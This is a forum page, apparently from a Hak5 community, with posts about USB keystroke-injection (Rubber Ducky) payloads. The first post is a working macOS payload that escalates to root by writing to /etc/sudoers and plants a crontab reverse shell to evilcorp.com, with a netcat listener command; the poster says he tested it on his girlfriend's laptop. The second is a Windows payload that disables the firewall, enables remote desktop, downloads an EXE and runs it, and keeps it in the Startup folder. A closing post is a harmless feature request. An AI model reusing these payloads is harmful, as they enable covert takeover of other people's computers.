Search the Community

Hi! I'm new to the Rubber Ducky and to this community. I've made a simple payload to create a reverse bash in an OS X target by using crontab. I've seen some examples that use complicated generated plist files, and I'm not sure about what the advantage is over setting a cron to recover the session. Anyway, this is my payload: DELAY 2000 REM --------------- OPEN TERMINAL IN A NEW WINDOW --------------- COMMAND SPACE DELAY 300 STRING Terminal DELAY 300 ENTER DELAY 700 COMMAND n DELAY 500 REM --------------- ESCALATE PRIVILEGES --------------- STRING echo 'echo "$(whoami) ALL=(ALL) NOPASSWD:ALL" >&3' | DYLD_PRINT_TO_FILE=/etc/sudoers newgrp; sudo -s ENTER DELAY 200 REM --------------- RUN PAYLOAD --------------- STRING (crontab -l ; echo "* * * * * bash -i >& /dev/tcp/evilcorp.com/443 0>&1")| crontab - ENTER DELAY 200 REM --------------- SET PRIVILEGES BACK TO NORMAL --------------- STRING echo -e '$d\nw\nq'| ed /etc/sudoers ENTER DELAY 200 REM --------------- CLOSE TERMINAL --------------- STRING exit ENTER COMMAND Q What this does is: Open the terminal Magically grant sudo privileges (many thanks to V3sth4cks153 for this) Add a line to the root crontab to execute the reverse bash script every minute (replace «evilcorp.com» with your host / IP) Remove the newly added privileges to the current user in /etc/sudoers Close the terminal app The whole execution takes around 5 seconds. So now, all we have to do in our attacking machine is: sudo nc -l -p 443 We wait one minute (max) and we're in with root privileges Since the script is in root's crontab, we will always have root privileges, and if we close the connection, we can always re-take it. Another advantage is that by using port 443, the victim machine will not be blocked by any firewall. You can change the port to whatever you want. I just tested it on my girlfriend's Macbook Air and it works flawlessly. One thing that bothers me (remember, I'm new) is that some keys like the arrows don't work, so when I want to edit a file using vi, or something like that, I can't. Maybe you guys can point me to some solution to this? Same happens when I want to get files from the victim using FTP or SCP. When it's supposed to ask for my password, the connection stops responding and I have to re-connect. Hope you like it!

This is a simple modification to the powershell reverse payload w/UAC for Win7 in simple-ducky to make it persistent. All credit goes to Skysploit for this payload! I added the quicker UAC bypass method and edited the location that the EXE is placed for persistence. Verified system privileges after log off and reboots! :D ****************************************************************************************************************************** DELAY 5000 ESCAPE DELAY 400 CONTROL ESCAPE DELAY 400 STRING cmd DELAY 400 MENU DELAY 400 STRING a DELAY 700 ALT Y DELAY 800 ENTER STRING netsh firewall set opmode disable ENTER DELAY 300 STRING reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f ENTER DELAY 300 STRING reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f ENTER DELAY 300 STRING powershell (new-object System.Net.WebClient).DownloadFile('http://<server_name>/winmgmt.txt','%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winmgmt.exe'); Start-Process "'%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\\winmgmt.exe'" ENTER STRING exit ENTER ****************************************************************************************************************************** You MUST use simple-ducky by Skysploit to generate this payload and place the winmgmt.txt file in your webserver location. After you have gone through creating the payload simply delete the created "inject.bin" file and open the "payload.txt" file for editing. Delete all text and paste in the payload code above. Then in terminal type the following 2 commands: cd /usr/share/ducky/encoder (for Kali, if using a different OS then cd to the directory your "encoder.jar" file is in) java -jar encoder.jar -i payload.txt -o inject.bin (now place the "inject.bin" file on your ducky and use as you normally would)

I really would be a nice feature to keep /www/pineapple/modules/moduleList after a firmware upgrade. So you don't have to "reinstall" all infusions again after a upgrade. Besides the modules are still installed on the usb, but moduleList is wiped when upgrading. Or create a checkbox system for the available infusions, so you can install multiple infusions at once ;)